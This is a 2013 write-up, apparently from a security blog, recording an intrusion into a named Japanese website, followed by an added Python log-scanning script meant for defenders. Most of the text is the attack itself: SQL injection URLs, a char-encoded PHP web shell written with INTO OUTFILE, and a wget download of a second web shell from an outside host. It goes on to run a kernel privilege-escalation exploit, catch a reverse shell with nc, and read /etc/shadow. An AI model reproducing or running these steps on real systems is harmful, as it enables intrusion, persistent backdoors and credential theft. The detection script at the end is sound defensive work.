
A Japanese H-site from n years ago

2013-01-30 17:55

Injection point: http://ciao.sc/select/goods_detail.php?id=48

Guessing the columns: http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10/*

http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20user(),2,3,4,5,6,7,8,9,10/*

goods_id=root@localhost. Root privileges, so this looks promising. Moving on:

http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3,4,5,6,7,8,9,10/*

Test succeeded.

http://ciao.sc/select/goods_detail.php?id=48%20and%201=2%20union%20select%20char(60,63,112,104,112,32,112,97,115,115,116,104,114,117,40,36,95,71,69,84,91,39,99,109,100,39,93,41,32,63,62),2,3,4,5,6,7,8,9,10 into outfile '/home/ciaosc/ciao.sc/xx.php'/*

http://ciao.sc/xx.php?cmd=ls -al

total 1224
drwxrwxrwx 13 root root 4096 Dec 11 12:52 .
drwxr-xr-x 6 ciaosc ciaosc 4096 Feb 25 2009 ..
-rw-r--r-- 1 ciaosc ciaosc 2626 Aug 2 2008 ask.php
-rw-r--r-- 1 ciaosc ciaosc 993 Aug 2 2008 ask_cfg.php
drwxr-xr-x 2 ciaosc ciaosc 4096 Dec 5 2008 banner
-rw-r--r-- 1 ciaosc ciaosc 6668 Apr 20 2009 business.html
-rw-r--r-- 1 ciaosc ciaosc 6408 Nov 19 2008 business_back.html
drwxr-xr-x 2 ciaosc ciaosc 4096 Dec 28 2008 cgi-bin
-rw-r--r-- 1 ciaosc ciaosc 1150 Apr 15 2009 ciao_icon.ico
drwxr-xr-x 16 ciaosc ciaosc 4096 Jul 20 23:00 contents

Hide it in another location and use wget to upload a webshell:

http://ciao.sc/xx.php?cmd=/usr/bin/wget http://members.lycos.co.uk/gogopw/1QIqiQIcE4u.txt -O /home/ciaosc/ciao.sc/log/ctry_usage_200910.php

http://ciao.sc/log/ctry_usage_200910.php 1QIqiQIcE4u

Escalate privileges.

uname -a

Linux localhost.localdomain 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686 i686 i386 GNU/Linux

Find a suitable exploit and upload it.

tar -zxvf 2009-linux-sendpage3.tar.gz

Put exploit.c, exploit-pulseaudio.c, run, runcon-mmap_zero and sesearch-mmap_zero in the same directory.

chmod 777 run

Connect a reverse shell back to the local machine.

Back Connect 5786

nc -vv -l -p 5786

./run

socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Socket type not supported
socket: Address family not supported by protocol
sh: no job control in this shell

sh-3.1# id

uid=0(root) gid=0(root) groups=48(apache)

sh-3.1# cat /etc/shadow

Source: insight-labs.org/?p=713
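
An added example, not part of the original write-up: a log check a defender could run over web access logs to flag the request patterns this intrusion leaves behind (UNION SELECT probing, load_file reads, INTO OUTFILE writes, char()-encoded strings, and a script called with a cmd parameter). The rule names, the /log/report.php path and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Rule name -> pattern, applied to the URL-decoded, lower-cased query string.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b"),
    "char_encoded_string": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+){3,}\s*\)"),
}
CHAR_CALL = re.compile(r"char\s*\(([\d\s,]+)\)", re.I)

def decode_char_calls(text):
    """Return the strings hidden in MySQL char(n,n,...) calls, for the analyst."""
    out = []
    for m in CHAR_CALL.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes if c < 0x110000))
    return out

def inspect(request_target):
    """Classify one request target (path?query) taken from an access log."""
    parts = urlsplit(request_target)
    query = unquote_plus(parts.query)
    hits = [name for name, rx in RULES.items() if rx.search(query.lower())]
    # A script called with a 'cmd' parameter matches the web-shell stage.
    if "cmd" in parse_qs(parts.query, keep_blank_values=True):
        hits.append("cmd_parameter")
    return {"path": parts.path, "hits": hits, "decoded": decode_char_calls(query)}

# Constructed sample request targets (not real log data).
SAMPLE = [
    "/select/goods_detail.php?id=48",
    "/select/goods_detail.php?id=48%20and%201=2%20union%20select%201,2,3/*",
    "/select/goods_detail.php?id=48%20and%201=2%20union%20select%20"
    "load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3/*",
    "/log/report.php?cmd=uname%20-a",
]

def scan(targets):
    """Return only the requests that matched at least one rule."""
    return [r for r in map(inspect, targets) if r["hits"]]

if __name__ == "__main__":
    for r in scan(SAMPLE):
        print(r["path"], r["hits"], r["decoded"])
```

Detection only narrows the window; the steps above also depended on the application connecting to MySQL as root (which carries the FILE privilege) and on a world-writable web root, both of which are configuration fixes.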
